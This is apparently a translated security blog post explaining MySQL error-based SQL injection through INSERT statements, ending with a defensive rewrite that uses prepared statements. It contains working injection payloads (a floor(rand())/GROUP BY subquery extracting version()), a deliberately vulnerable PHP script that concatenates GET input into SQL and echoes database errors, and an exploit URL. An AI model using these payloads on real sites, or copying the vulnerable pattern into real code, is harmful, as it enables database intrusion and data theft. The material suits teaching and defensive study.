By Ay shadow
Some readers may ask why I am writing about this again when it has already been covered. Heh, the principle is the same, but the form is a bit different, and this method seems to apply only to MySQL; it does not work on MSSQL. As for other databases, I have never tried them and am not familiar with them.
First, compare the INSERT statement form covered previously with the one discussed here.
INSERT INTO tbl_name SET column_name = [here]
The injection method for this form is INSERT INTO tbl_name SET column_name = [here] xor (SQL statement) or '
This form of injection is very common and highly practical.
INSERT INTO tbl_name (col1, col2, col3, col4) VALUES (xxx, xxxx, $_GET[id], xxx);
This is the usual form, haha.
MySQL supports SELECT subqueries inside VALUES; MSSQL does not. Here is an example.
1. Running it directly in MySQL
INSERT INTO test (id, name, textcontents)
VALUES (1, (SELECT 1 FROM (SELECT count(*), concat(floor(rand(0)*2), (SELECT version())) a FROM information_schema.tables GROUP BY a) b), 'xxxxxxxx');
This successfully returned the information we wanted.
2. Script demonstration
To prove that my idea works, I wrote a vulnerable script myself and tested it on Apache + PHP + MySQL. It works, but with one restriction: the PHP code must output the MySQL error message, for example mysql_query($sql) or die("Invalid query: " . mysql_error()); Code usually has a die() like this, but some sites do not write one, and without it no error-based injection is possible.
DEMO code:
================= PHP code =================
<?php
$host     = "www.2cto.com";
$db_name  = "test";
$user     = "root";
$password = "123456789";
// Deliberately vulnerable demo: $_GET['id'] is concatenated unquoted into the INSERT
$sql = "insert into t (id, name, msg) values (1, " . $_GET['id'] . ", 'msgmsgmsg')";
echo "The statement executed this time is " . $sql . "<br>";
$link = mysql_connect($host, $user, $password) or die("couldn't connect! " . mysql_error());
mysql_select_db($db_name, $link) or die("failed to select database " . mysql_error());
// The die() below prints mysql_error() to the client; the demo relies on this output
mysql_query($sql) or die("Invalid query: " . mysql_error());
// echo $sql;
echo "<br>database updated";
mysql_close($link);
?>
================= MySQL table =================
CREATE TABLE t (id INT, name CHAR(255), msg CHAR(255));
===============================================
Result
Demo statement:
inserti.php?id=test1, (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2), (SELECT version())) a from information_schema.tables group by a) B) %23
This confirms my idea. Heh.
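As an added example, not code from the original post: the same demo rewritten so that the request value is bound as data and the raw MySQL error is logged instead of echoed, which removes both conditions the demo above depends on. The DSN, account name and password are placeholders.

```php
<?php
// Added example, not the original author's code: the demo above rewritten with
// PDO prepared statements. The GET value is bound as data, so a subquery in it
// is stored as text, and the raw MySQL error is logged, not shown to the client.
$dsn      = 'mysql:host=127.0.0.1;dbname=test;charset=utf8mb4'; // placeholder host/db
$user     = 'app_user';   // placeholder: a least-privilege account, not root
$password = 'CHANGE_ME';  // placeholder

try {
    $pdo = new PDO($dsn, $user, $password, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // server-side prepare: data never re-enters the SQL parser
    ]);
} catch (PDOException $e) {
    error_log('db connect failed: ' . $e->getMessage()); // detail stays in the server log
    http_response_code(500);
    exit('database unavailable');
}

// Same shape as the demo: id fixed, name taken from ?id=..., msg fixed.
// Check type and length against the CHAR(255) column before touching the database.
$name = $_GET['id'] ?? '';
if (!is_string($name) || $name === '' || strlen($name) > 255) {
    http_response_code(400);
    exit('invalid name');
}

$stmt = $pdo->prepare('INSERT INTO t (id, name, msg) VALUES (?, ?, ?)');
try {
    $stmt->execute([1, $name, 'msgmsgmsg']);
} catch (PDOException $e) {
    // No mysql_error() in the response: there is nothing for error-based injection to read back.
    error_log('insert failed: ' . $e->getMessage());
    http_response_code(500);
    exit('database error');
}
echo 'database updated';
```

With this version the demo statement from the result section is stored verbatim as the text of the name column, and any server error yields only a generic 500 page.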